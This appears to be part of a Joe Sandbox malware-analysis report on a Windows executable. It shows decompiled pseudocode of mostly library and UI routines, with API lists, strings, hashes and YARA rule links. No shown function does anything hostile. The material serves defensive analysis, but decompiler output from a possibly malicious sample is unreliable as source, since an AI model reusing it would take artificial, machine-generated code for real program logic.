                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 00407A53: __EH_prolog.LIBCMT ref: 00407A58
                                                                                • Part of subcall function 004079E3: __EH_prolog.LIBCMT ref: 004079E8
                                                                                • Part of subcall function 00407A53: _strlen.LIBCMT ref: 00407A8E
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040678C: __EH_prolog.LIBCMT ref: 00406791
                                                                                • Part of subcall function 00407310: __EH_prolog.LIBCMT ref: 00407315
                                                                              • VariantClear.OLEAUT32(00000008), ref: 0040802B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ByteCharClearMultiVariantWide_strlenlstrlen
                                                                              • String ID: LastName LIKE
                                                                              • API String ID: 363168213-2611627017
                                                                              • Opcode ID: 4eac84c690d29f96d8d1ae116c6d98f5f3b5857d1077201e88d1748835a80e72
                                                                              • Instruction ID: a39476e610684e5fe9a2661ed1b74580fa46c41ad10017c35eedca349a0b8653
                                                                              • Opcode Fuzzy Hash: 4eac84c690d29f96d8d1ae116c6d98f5f3b5857d1077201e88d1748835a80e72
                                                                              • Instruction Fuzzy Hash: 26319271E00148ABDB04E7B9C856BEFB7A8AF4435CF00456EF516B72C2DA7C5A0487A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419FB1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E00419FB1(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E00419F94((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x457abc; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E00419460((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}














                                                                              0x00419fb1
                                                                              0x00419fb9
                                                                              0x00419fbb
                                                                              0x00419fd4
                                                                              0x00419fd9
                                                                              0x00419fdd
                                                                              0x00419fdf
                                                                              0x00419fe1
                                                                              0x00419fe4
                                                                              0x00419fe4
                                                                              0x00419feb
                                                                              0x00419fed
                                                                              0x00419ff2
                                                                              0x00419ff4
                                                                              0x00419ff6
                                                                              0x00419ffc
                                                                              0x00419ffc
                                                                              0x0041a01c
                                                                              0x0041a01e
                                                                              0x0041a020
                                                                              0x0041a020
                                                                              0x0041a026
                                                                              0x0041a02a
                                                                              0x0041a02f
                                                                              0x0041a030
                                                                              0x0041a032
                                                                              0x0041a034
                                                                              0x0041a034
                                                                              0x0041a037
                                                                              0x0041a03b
                                                                              0x0041a03d
                                                                              0x0041a040
                                                                              0x0041a043
                                                                              0x0041a045
                                                                              0x0041a045
                                                                              0x0041a047
                                                                              0x0041a04b
                                                                              0x0041a04d
                                                                              0x0041a050
                                                                              0x0041a053
                                                                              0x0041a055
                                                                              0x0041a055
                                                                              0x0041a057
                                                                              0x0041a057
                                                                              0x0041a05e

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: __shift_strcat_strlen
                                                                              • String ID: e+000
                                                                              • API String ID: 208078240-1027065040
                                                                              • Opcode ID: 42616503be8c7573ea38e254a357175daa829c594adc9f4f1e626597b1da27f2
                                                                              • Instruction ID: 49197515b30677988268bfe23769aa6f66af329e348120644e6b7bacb5b61efd
                                                                              • Opcode Fuzzy Hash: 42616503be8c7573ea38e254a357175daa829c594adc9f4f1e626597b1da27f2
                                                                              • Instruction Fuzzy Hash: 2F21AE322093945FD71A8E389CA07E63F949B07358F1C44AFE085CA292D67ED9C6C35A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417735, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E00417735() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x45be8c; // 0x1
				if(_t45 == 0) {
					E00413A27();
				}
				 *0x45a71c = 0;
				GetModuleFileNameA(0, 0x45a618, 0x104);
				_t10 =  *0x45be90; // 0x5d3310
				 *0x45a420 = 0x45a618;
				if(_t10 == 0) {
					L4:
					_t25 = 0x45a618;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E004175C9(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E00412247(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E004175C9(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x45a404 = _v8 - 1;
					 *0x45a408 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                              0x00417739
                                                                              0x0041773f
                                                                              0x00417745
                                                                              0x00417747
                                                                              0x00417747
                                                                              0x00417758
                                                                              0x0041775f
                                                                              0x00417765
                                                                              0x0041776c
                                                                              0x00417772
                                                                              0x0041777b
                                                                              0x0041777b
                                                                              0x00417774
                                                                              0x00417777
                                                                              0x00417779
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417779
                                                                              0x00417789
                                                                              0x00417794
                                                                              0x0041779a
                                                                              0x0041779f
                                                                              0x004177a6
                                                                              0x004177ba
                                                                              0x004177c4
                                                                              0x004177ca
                                                                              0x004177d0
                                                                              0x004177a8
                                                                              0x004177a8
                                                                              0x004177a8
                                                                              0x004177d6

                                                                              APIs
                                                                              • ___initmbctable.LIBCMT ref: 00417747
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lK8vF3n2e7.exe,00000104,74B04DE0,00000000,?,?,?,?,00412E7D,?,0044BC68,00000060), ref: 0041775F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName___initmbctable
                                                                              • String ID: C:\Users\user\Desktop\lK8vF3n2e7.exe
                                                                              • API String ID: 767393020-1524404040
                                                                              • Opcode ID: 4aa6bfedd45c87f98334d07c1f7acca7055357ef1ded89f83587537b5a094804
                                                                              • Instruction ID: 457d7393be54ac7cc5c3ea1c43a3c6052e7685e44cc6ff2440ebf8175e7fa41b
                                                                              • Opcode Fuzzy Hash: 4aa6bfedd45c87f98334d07c1f7acca7055357ef1ded89f83587537b5a094804
                                                                              • Instruction Fuzzy Hash: 3811E772A08204ABD711CBD5EC459DB7BF8EB45365F10016BF915D3252D6B4EE80CB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407EB2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00407EB2(void* __ecx) {
				void* __ebp;
				long* _t16;
				void* _t17;

				_t17 = __ecx;
				E004248A3(__ecx);
				E0040763F(_t17 + 0x120, "You are now disconnected");
				_push(0);
				E00425C57(_t17);
				_t16 = _t17 + 0x128;
				SendMessageA( *(_t17 + 0x1c), 0x80, 1,  *_t16);
				SendMessageA( *(_t17 + 0x1c), 0x80, 0,  *_t16);
				return 1;
			}






                                                                              0x00407eb6
                                                                              0x00407eb8
                                                                              0x00407ec8
                                                                              0x00407ecd
                                                                              0x00407ed1
                                                                              0x00407edc
                                                                              0x00407eef
                                                                              0x00407ef9
                                                                              0x00407f02

                                                                              APIs
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 00407EEF
                                                                              • SendMessageA.USER32(?,00000080,00000000,?), ref: 00407EF9
                                                                              Strings
                                                                              • You are now disconnected, xrefs: 00407EBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$H_prolog
                                                                              • String ID: You are now disconnected
                                                                              • API String ID: 1044275984-1446601973
                                                                              • Opcode ID: 4f444b52a2b3a6c0eba978bbca680b64658326418fefbe5be81fd9bfc7d48796
                                                                              • Instruction ID: db815257b76fa78ff58344e40ec2a72f0eb2c5048cfbb90b59a668fa96a059d9
                                                                              • Opcode Fuzzy Hash: 4f444b52a2b3a6c0eba978bbca680b64658326418fefbe5be81fd9bfc7d48796
                                                                              • Instruction Fuzzy Hash: 43F0E5312007147FE6306A62EC81F977769EF44358F10082AF181220E0CAA778159658
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042254F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042254F(intOrPtr* __ecx, char _a4) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t21;
				intOrPtr* _t22;

				_t22 = __ecx;
				_t1 =  &_a4; // 0x44e630
				_t21 =  *_t1;
				 *__ecx = 0x44e7d0;
				_t9 =  *((intOrPtr*)(_t21 + 8));
				 *((intOrPtr*)(__ecx + 8)) = _t9;
				if(_t9 == 0) {
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t21 + 4));
				} else {
					_t14 = E00412247(E00411A30( *((intOrPtr*)(_t21 + 4))) + 1);
					 *((intOrPtr*)(_t22 + 4)) = _t14;
					if(_t14 != 0) {
						E00419460(_t14,  *((intOrPtr*)(_t21 + 4)));
					}
				}
				return _t22;
			}







                                                                              0x00422550
                                                                              0x00422553
                                                                              0x00422553
                                                                              0x00422557
                                                                              0x0042255d
                                                                              0x00422562
                                                                              0x00422565
                                                                              0x0042258f
                                                                              0x00422567
                                                                              0x00422571
                                                                              0x0042257a
                                                                              0x0042257d
                                                                              0x00422583
                                                                              0x00422589
                                                                              0x0042257d
                                                                              0x00422596

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat_strlen
                                                                              • String ID: 0D
                                                                              • API String ID: 432593777-130544292
                                                                              • Opcode ID: 245b0eaabc1113af17cd50058898e9e5956153ac3d766621995d16eff27b125f
                                                                              • Instruction ID: 660e6d80282afe55b9ca1b5ba13e9f57e9cf4bf23a46981716cdfd782ecacaad
                                                                              • Opcode Fuzzy Hash: 245b0eaabc1113af17cd50058898e9e5956153ac3d766621995d16eff27b125f
                                                                              • Instruction Fuzzy Hash: 62F012B16096117F97149B56E601856F7E8FF14710310C92FE469C3650E7B4EC91CA98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004205CC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E004205CC(void* __eflags) {
				intOrPtr* _t19;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;

				E004128A0(E0043157B, _t23);
				E00420298(_t23 - 0x28, __eflags, "string too long");
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_push(_t23 - 0x28);
				_t19 = _t23 - 0x50;
				E00420460(_t19,  *(_t23 - 4));
				_t6 = _t23 - 0x50; // 0x453434
				 *((intOrPtr*)(_t23 - 0x50)) = 0x44e630;
				E004128BF(_t6, 0x453434);
				asm("int3");
				_push( *((intOrPtr*)(_t24 - 0x44 + 8)));
				_t21 = _t19;
				E00420571(_t19);
				 *_t21 = 0x44e630;
				return _t21;
			}







                                                                              0x004205d1
                                                                              0x004205e1
                                                                              0x004205e6
                                                                              0x004205ed
                                                                              0x004205ee
                                                                              0x004205f1
                                                                              0x004205fb
                                                                              0x004205ff
                                                                              0x00420606
                                                                              0x0042060b
                                                                              0x0042060d
                                                                              0x00420611
                                                                              0x00420613
                                                                              0x00420618
                                                                              0x00420621

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004205D1
                                                                                • Part of subcall function 00420460: __EH_prolog.LIBCMT ref: 00420465
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                                • Part of subcall function 00420571: __EH_prolog.LIBCMT ref: 00420576
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionRaise
                                                                              • String ID: 44E$string too long
                                                                              • API String ID: 2062786585-1535144175
                                                                              • Opcode ID: c96dab0491a1c3167e5770b79897b544847c4d45c5a5cf4b205a4e3f71641e6b
                                                                              • Instruction ID: cd35089e4a56513c013366e30973142a941b0513eef853e0cfbbcd2deb006add
                                                                              • Opcode Fuzzy Hash: c96dab0491a1c3167e5770b79897b544847c4d45c5a5cf4b205a4e3f71641e6b
                                                                              • Instruction Fuzzy Hash: 3DE0E5B1A00128A7C700FFE1D802ACEB7B4BF24355F80851FF400A6156DBBC85488BAC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420531, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E00420531(void* __eflags) {
				intOrPtr* _t27;
				intOrPtr* _t35;
				void* _t37;

				E004128A0(E0043157B, _t37);
				E00420298(_t37 - 0x28, __eflags, "invalid string position");
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				_push(_t37 - 0x28);
				_t27 = _t37 - 0x50;
				E00420460(_t27, __eflags);
				 *((intOrPtr*)(_t37 - 0x50)) = 0x44e63c;
				E004128BF(_t37 - 0x50, 0x4533b0);
				asm("int3");
				E004128A0(E00431569, _t37);
				_push(_t27);
				_t31 =  *((intOrPtr*)(_t37 + 8));
				_t35 = _t27;
				 *((intOrPtr*)(_t37 - 0x10)) = _t35;
				E0042254F(_t27,  *((intOrPtr*)(_t37 + 8)));
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				 *_t35 = 0x44e624;
				E00403B83(_t35 + 0xc, _t31 + 0xc);
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t35;
			}






                                                                              0x00420536
                                                                              0x00420546
                                                                              0x0042054b
                                                                              0x00420552
                                                                              0x00420553
                                                                              0x00420556
                                                                              0x00420564
                                                                              0x0042056b
                                                                              0x00420570
                                                                              0x00420576
                                                                              0x0042057b
                                                                              0x0042057e
                                                                              0x00420581
                                                                              0x00420584
                                                                              0x00420587
                                                                              0x0042058c
                                                                              0x00420597
                                                                              0x0042059d
                                                                              0x004205a9
                                                                              0x004205b1

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00420536
                                                                                • Part of subcall function 00420460: __EH_prolog.LIBCMT ref: 00420465
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionRaise
                                                                              • String ID: <D$invalid string position
                                                                              • API String ID: 2062786585-1737862221
                                                                              • Opcode ID: 6461c3475ee7efb81e19f03c249e580cb41d76462ae92be3bb7c1df470df78fb
                                                                              • Instruction ID: 59a6efc3b7158ee38e0614d9221a968775124c8b4a3fe33e62db44cea458a9e3
                                                                              • Opcode Fuzzy Hash: 6461c3475ee7efb81e19f03c249e580cb41d76462ae92be3bb7c1df470df78fb
                                                                              • Instruction Fuzzy Hash: 8EE08CB190011CAACB00FBE1C807ACE73B8BF24309F94815BF401E5046DFB856088A2D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041CCFB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041CCFB(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;
				void* _t8;
				void* _t11;

				_t2 = _a4;
				if(_t2 < 0x457ac8 || _t2 > 0x457d28) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E004148F8(_t8, _t11, (_t2 - 0x457ac8 >> 5) + 0x10);
				}
			}







                                                                              0x0041ccfb
                                                                              0x0041cd06
                                                                              0x0041cd1f
                                                                              0x0041cd23
                                                                              0x0041cd29
                                                                              0x0041cd0f
                                                                              0x0041cd1e
                                                                              0x0041cd1e

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041CD18
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • EnterCriticalSection.KERNEL32(?,00422721,?,0044E808,0000000C,00421305,?), ref: 0041CD23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterSection$__lock
                                                                              • String ID: (}E
                                                                              • API String ID: 3410214836-1429765358
                                                                              • Opcode ID: 7c6143fd1b5c939171a8b81e0d3eea32178bad485a97dc063076ffd0903f3e15
                                                                              • Instruction ID: 6da6b200d2b2378a4a7b5ee90335d753f3eaeb3ff4692c331bcdd93487e60daf
                                                                              • Opcode Fuzzy Hash: 7c6143fd1b5c939171a8b81e0d3eea32178bad485a97dc063076ffd0903f3e15
                                                                              • Instruction Fuzzy Hash: 7CD022B660020113EF2C26B6BFC955D3A1CEA803833284C7BFA01C12C2CF2CD8C0411C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00422257, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00422257() {

				E00422288(0x453720, 0x458378);
				goto __eax;
			}



                                                                              0x00422269
                                                                              0x00422270

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00422269
                                                                                • Part of subcall function 00422288: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004222FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                              • String ID: W"B$x"B
                                                                              • API String ID: 123106877-1503379534
                                                                              • Opcode ID: 41246cb5f60f665431d29ea6b1548c52e7ae522f50dc775474ae167bce50599f
                                                                              • Instruction ID: d8e7f714c227ad55c174fcca8010151fad5562a3f4915d7de80357c28d51ad38
                                                                              • Opcode Fuzzy Hash: 41246cb5f60f665431d29ea6b1548c52e7ae522f50dc775474ae167bce50599f
                                                                              • Instruction Fuzzy Hash: 75B092C2B98225BD210451016A0283A150CC080B533B0835FFC01E01429A8AAA4A003F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DF9A, Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E0042DF9A(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0042DD8C( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                                                                              0x0042df9d
                                                                              0x0042dfa2
                                                                              0x0042dfa5
                                                                              0x0042dfaa
                                                                              0x0042dfac
                                                                              0x0042dfaf
                                                                              0x0042dff3
                                                                              0x0042dff3
                                                                              0x0042dff7
                                                                              0x0042e001
                                                                              0x0042e007
                                                                              0x0042e010
                                                                              0x0042e01c
                                                                              0x0042e022
                                                                              0x0042e028
                                                                              0x0042e02c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dfb1
                                                                              0x0042dfb1
                                                                              0x0042dfb1
                                                                              0x0042dfb6
                                                                              0x0042dfd3
                                                                              0x0042dfd8
                                                                              0x0042dfde
                                                                              0x0042dfde
                                                                              0x0042dfe0
                                                                              0x0042dfe3
                                                                              0x0042dfc1
                                                                              0x0042dfc1
                                                                              0x0042dfc8
                                                                              0x0042dfca
                                                                              0x0042dfca
                                                                              0x0042dfc8
                                                                              0x0042dfe7
                                                                              0x0042dfe8
                                                                              0x0042dff1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0042DFF7
                                                                              • LeaveCriticalSection.KERNEL32(?,?), ref: 0042E007
                                                                              • LocalFree.KERNEL32(?), ref: 0042E010
                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0042E022
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
